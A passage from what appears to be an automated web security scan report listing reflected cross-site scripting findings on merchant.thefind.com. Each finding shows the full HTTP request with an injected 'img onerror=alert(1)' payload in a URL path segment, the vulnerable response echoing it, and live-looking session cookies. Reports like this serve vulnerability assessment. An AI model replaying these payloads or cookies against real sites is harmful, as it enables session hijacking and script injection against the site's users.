[Could not find component: scripts.utils.e18f5<img src=a onerror=alert(1)>fc1f8623cd3]
</div>
...[SNIP]...

1.63. https://merchant.thefind.com/scripts/utils/browser.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/browser.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c2dd4<img%20src%3da%20onerror%3dalert(1)>ad4b64a4eb7 was submitted in the REST URL parameter 1. This input was echoed as c2dd4<img src=a onerror=alert(1)>ad4b64a4eb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scriptsc2dd4<img%20src%3da%20onerror%3dalert(1)>ad4b64a4eb7/utils/browser.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:14 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 209
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"browser","fullname":"scriptsc2dd4<img src=a onerror=alert(1)>ad4b64a4eb7.utils.browser","path":".","type":"missing","components":null,"payload":""}}

1.64. https://merchant.thefind.com/scripts/utils/browser.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/browser.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73731<img%20src%3da%20onerror%3dalert(1)>ab39152302b was submitted in the REST URL parameter 2. This input was echoed as 73731<img src=a onerror=alert(1)>ab39152302b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils73731<img%20src%3da%20onerror%3dalert(1)>ab39152302b/browser.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:30 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 209
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"browser","fullname":"scripts.utils73731<img src=a onerror=alert(1)>ab39152302b.browser","path":".","type":"missing","components":null,"payload":""}}

1.65. https://merchant.thefind.com/scripts/utils/browser.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/browser.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18a45<img%20src%3da%20onerror%3dalert(1)>6e6b9cdf01d was submitted in the REST URL parameter 3. This input was echoed as 18a45<img src=a onerror=alert(1)>6e6b9cdf01d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils/18a45<img%20src%3da%20onerror%3dalert(1)>6e6b9cdf01d HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:48 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9551

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.utils.18a45<img src=a onerror=alert(1)>6e6b9cdf01d]
</div>
...[SNIP]...

1.66. https://merchant.thefind.com/scripts/utils/elation.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/elation.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload afb6b<img%20src%3da%20onerror%3dalert(1)>855b4d8549a was submitted in the REST URL parameter 1. This input was echoed as afb6b<img src=a onerror=alert(1)>855b4d8549a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scriptsafb6b<img%20src%3da%20onerror%3dalert(1)>855b4d8549a/utils/elation.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:39 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 209
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"elation","fullname":"scriptsafb6b<img src=a onerror=alert(1)>855b4d8549a.utils.elation","path":".","type":"missing","components":null,"payload":""}}

1.67. https://merchant.thefind.com/scripts/utils/elation.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/elation.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6ce8d<img%20src%3da%20onerror%3dalert(1)>fc29000a924 was submitted in the REST URL parameter 2. This input was echoed as 6ce8d<img src=a onerror=alert(1)>fc29000a924 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils6ce8d<img%20src%3da%20onerror%3dalert(1)>fc29000a924/elation.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:09 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 209
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"elation","fullname":"scripts.utils6ce8d<img src=a onerror=alert(1)>fc29000a924.elation","path":".","type":"missing","components":null,"payload":""}}

1.68. https://merchant.thefind.com/scripts/utils/elation.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/elation.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d0f19<img%20src%3da%20onerror%3dalert(1)>c1c1518a1b9 was submitted in the REST URL parameter 3. This input was echoed as d0f19<img src=a onerror=alert(1)>c1c1518a1b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils/d0f19<img%20src%3da%20onerror%3dalert(1)>c1c1518a1b9 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:00 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9551

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.utils.d0f19<img src=a onerror=alert(1)>c1c1518a1b9]
</div>
...[SNIP]...

1.69. https://merchant.thefind.com/scripts/utils/events.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/events.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 77722<img%20src%3da%20onerror%3dalert(1)>51367c0def was submitted in the REST URL parameter 1. This input was echoed as 77722<img src=a onerror=alert(1)>51367c0def in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts77722<img%20src%3da%20onerror%3dalert(1)>51367c0def/utils/events.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:17 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 206
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"events","fullname":"scripts77722<img src=a onerror=alert(1)>51367c0def.utils.events","path":".","type":"missing","components":null,"payload":""}}

1.70. https://merchant.thefind.com/scripts/utils/events.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/events.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a9b8<img%20src%3da%20onerror%3dalert(1)>125495aec84 was submitted in the REST URL parameter 2. This input was echoed as 5a9b8<img src=a onerror=alert(1)>125495aec84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils5a9b8<img%20src%3da%20onerror%3dalert(1)>125495aec84/events.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:33 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 207
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"events","fullname":"scripts.utils5a9b8<img src=a onerror=alert(1)>125495aec84.events","path":".","type":"missing","components":null,"payload":""}}

1.71. https://merchant.thefind.com/scripts/utils/events.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/events.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f041c<img%20src%3da%20onerror%3dalert(1)>e08ee87a7fc was submitted in the REST URL parameter 3. This input was echoed as f041c<img src=a onerror=alert(1)>e08ee87a7fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils/f041c<img%20src%3da%20onerror%3dalert(1)>e08ee87a7fc HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:49 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9551

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.utils.f041c<img src=a onerror=alert(1)>e08ee87a7fc]
</div>
...[SNIP]...

1.72. https://merchant.thefind.com/scripts/utils/initjquery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/initjquery.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 912c9<img%20src%3da%20onerror%3dalert(1)>0c50044c1c5 was submitted in the REST URL parameter 1. This input was echoed as 912c9<img src=a onerror=alert(1)>0c50044c1c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts912c9<img%20src%3da%20onerror%3dalert(1)>0c50044c1c5/utils/initjquery.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:25 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 215
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"initjquery","fullname":"scripts912c9<img src=a onerror=alert(1)>0c50044c1c5.utils.initjquery","path":".","type":"missing","components":null,"payload":""}}

1.73. https://merchant.thefind.com/scripts/utils/initjquery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/initjquery.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b6e9<img%20src%3da%20onerror%3dalert(1)>ae4196247 was submitted in the REST URL parameter 2. This input was echoed as 1b6e9<img src=a onerror=alert(1)>ae4196247 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils1b6e9<img%20src%3da%20onerror%3dalert(1)>ae4196247/initjquery.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:41 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 213
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"initjquery","fullname":"scripts.utils1b6e9<img src=a onerror=alert(1)>ae4196247.initjquery","path":".","type":"missing","components":null,"payload":""}}

1.74. https://merchant.thefind.com/scripts/utils/initjquery.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/initjquery.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f2549<img%20src%3da%20onerror%3dalert(1)>eebdba1c91c was submitted in the REST URL parameter 3. This input was echoed as f2549<img src=a onerror=alert(1)>eebdba1c91c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils/f2549<img%20src%3da%20onerror%3dalert(1)>eebdba1c91c HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:12 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9551

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
